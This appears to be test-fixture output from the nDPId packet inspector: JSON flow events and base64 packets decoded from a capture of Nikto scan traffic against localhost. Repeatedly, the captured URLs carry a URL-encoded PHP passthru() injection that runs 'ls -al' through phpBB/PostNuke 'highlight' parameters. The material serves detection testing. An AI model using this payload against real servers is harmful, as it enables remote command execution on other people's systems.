+01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277817,"pkt":"AAAAAAAAAAAAAAAACABFAAFvTQNAAEAG7oN\/AAABfwAAAccMH5C7inQwMMPyYoAYAED\/YwAAAQEICp1m\/2GdZv9hR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277819,"pkt":"AAAAAAAAAAAAAAAACABFAAF0lOFAAEAGpqB\/AAABfwAAAccOH5D5PK3yk85ZF4AYAED\/aAAAAQEICp1m\/2KdZv9iR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277821,"pkt":"AAAAAAAAAAAAAAAACABFAAFu9rlAAEAGRM5\/AAABfwAAAccQH5BepM+ZKyRDwoAYAED\/YgAAAQEICp1m\/2WdZv9lR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277822,"pkt":"AAAAAAAAAAAAAAAACABFAAFs7qZAAEAGTON\/AAABfwAAAccSH5AvkdeM6hywhIAYAED\/YAAAAQEICp1m\/2adZv9mR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277824,"pkt":"AAAAAAAAAAAAAAAACABFAAFsidNAAEAGsbZ\/AAABfwAAAccUH5D2t7Di3ewIxYAYAED\/YAAAAQEICp1m\/2idZv9oR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCg0K"} 
-01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277827,"pkt":"AAAAAAAAAAAAAAAACABFAAFnzSRAAEAGbmp\/AAABfwAAAccWH5CSlfQTmmOJAIAYAED\/WwAAAQEICp1m\/2qdZv9qR0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} 
-01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
